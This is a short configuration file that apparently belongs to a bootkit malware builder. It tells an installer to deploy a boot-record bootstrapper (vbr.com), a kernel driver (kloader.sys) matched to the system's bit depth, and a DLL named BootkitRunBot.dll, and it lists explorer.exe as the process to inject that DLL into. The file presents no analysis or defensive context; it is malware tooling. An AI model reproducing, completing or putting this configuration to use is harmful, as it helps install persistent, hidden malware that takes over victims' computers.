;Config file for the FJ
;Describes the device driver that you want to attach to install
;When you run the installer determines the bit depth of the operating system and installs the appropriate driver

;The bootstrapper
BIN: Release\vbr.com

;Drivers for 32-bit OS
DRV: ..\bin\Release\i386\kloader.sys

;Drivers for 64-bit OS
;DRV: ..\bin\Release\amd64\kloader.sys

;32-bit DLL
DLL: BootkitRunBot.dll

;List of processes where to inject 32-bit DLL
explorer.exe